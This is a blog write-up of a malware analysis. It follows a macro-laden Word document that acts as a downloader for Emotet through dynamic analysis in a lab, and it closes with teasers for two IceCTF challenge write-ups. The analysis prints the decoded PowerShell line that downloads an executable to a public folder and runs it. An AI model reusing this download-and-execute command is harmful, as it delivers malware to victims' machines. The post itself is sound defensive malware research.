Skip to main content

Emotet Downloader Write-Up

This write-up is for a macro embedded doc used as a downloader for Emotet.

Author: 5k33tz

MD5: 43d2a3df73fdcb10b9429a480d96ddcf

This sample first came to my attention by way of an alert for a download from an Emotet related URL. Looking at the PCAP I see a GET request to

After grabbing the file from the source and hashing it, I realized there were already 21/44 detections on VT. So I wanted to do some manual analysis to strengthen my skills and see how this sample works.

Running file against the sample:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Arorupyzheh-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Aug 25 00:31:00 2018, Last Saved Time/Date: Sat Aug 25 00:31:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0

We can see it's a Word Doc, but probably the most interesting thing is the Author information Arorupyzheh-PC.

Running the doc through, we can see that there are some macros embedded:

Next we can select one of the macros, decompress and dump it out, here is a truncated screenshot of the macro in item 9:

Since both macros are so heavily obfuscated, I decided to try some dynamic/behavioral analysis to see if we can get the deobfuscation routine to do the work for us and see the end-result.

In my WindowsREM VM I have Process Hacker running to monitor the process tree, and Process Monitor to view any command execution and file-system changes that may occur.

Also in my lab I have a REMnux VM that's setup as my default gateway, so I can monitor any "internet bound" traffic that's generated from my victim VM. On this VM I started up fakedns to resolve any DNS requests, INetSim to handle any file downloads, and Wireshark to get the in-depth packet data if needed.

With the tools running, I open the doc, and see it prompts the user to enable macros:

After clicking "Enable Content" and letting the macros do their thing, we can see in Process Hacker that WINWORD.EXE, launches cmd.exe, which then launches powershell.exe:

We could jump to the Linux VM and hopefully see any DNS resolution attempts of file download attempts, but first I'm interested to see the command-line invocations of cmd and PowerShell.

Saving the Process Monitor output to a CSV and importing it into ProcDOT, will give us a visualization of what the macros did on the system.

Viewing the command-line details for cmd.exe, we see the following:

Cleaning this up a bit and getting rid of the carets, we can see what looks like a base64 encoded command:

Interestingly enough base64 and powershell -e are in the reverse order, and the for loop at the end appears to un-reverse the command to launch in PowerShell. Reversing and decoding the base64 encoded string finally gives us some domains:

$BsQ=new-object Net.WebClient;$ipU=''.Split('@');$Gku = '707';$hBG=$env:public+'\'+$Gku+'.exe';foreach($CcE in $ipU){try{$BsQ.DownloadFile($CcE, $hBG);Invoke-Item $hBG;break;}catch{}}

The PowerShell script loops through an array of domains, attempts to download whatever is being hosted (presumably Emotet) and attempts to save the contents in C:\Users\Public\707.exe.

Unfortunately at the time of analysis, none of the binaries were hosted on the sites.



Popular posts from this blog

IceCTF 2018 - Picasso [Forensics]

Forensics – 1. Picasso Author: 5ynax and Valrkey Worth:  $150 Description: The challenge involved a GIF that we needed to extract a message from. So, for this challenge, we had two ways that we solved it at almost the same time. We have the long (5ynax) way and we have the fast (valrkey) way. The Long Way In the long way, I decided to extract each frame of the automated GIF and then import them into GIMP to layer them on top of one another. I used an online tool to get all of the frames, there was a lot of them, I used After I got the frames split up, I downloaded them and moved them to my box with GIMP ready for analysis. I later learned that I could have just imported the GIF into GIMP directly using the open as layers routine, but that's neither here nor there. For each layer there is an Alpha Channel. In GIMP under the colors menu, you can select the Color to Alpha Routine to get this box: This allows you to choose a color an

IceCTF 2018 – Anticaptcha [Miscellaneous]

Miscellaneous – 2. Anticaptcha Author: valrkey Worth: $250 Description:  Wow, this is a big captcha. Who has enough time to solve this? Seems like a lot of effort to me! As you can tell by the tiny scroll bar, there were a large number of questions (609) to be answered. To make things more difficult, each time the question was visited, the order and numeric value would be randomized. The questions generally followed one of three formats: What is the # word in the following line: ...? Is # a prime number? What is the greatest common divisor of # and #? For each of these question formats, I wrote a PowerShell function to determine the answer. Word in Line This function takes in the INDEX of the word requested and the LINE to take the word from. I added a line word length check just in case the IceCTF staff are jerks and give a too-large index. Everything should be accounted for the after mapping the 1st word" to the 0th array index and getting rid of any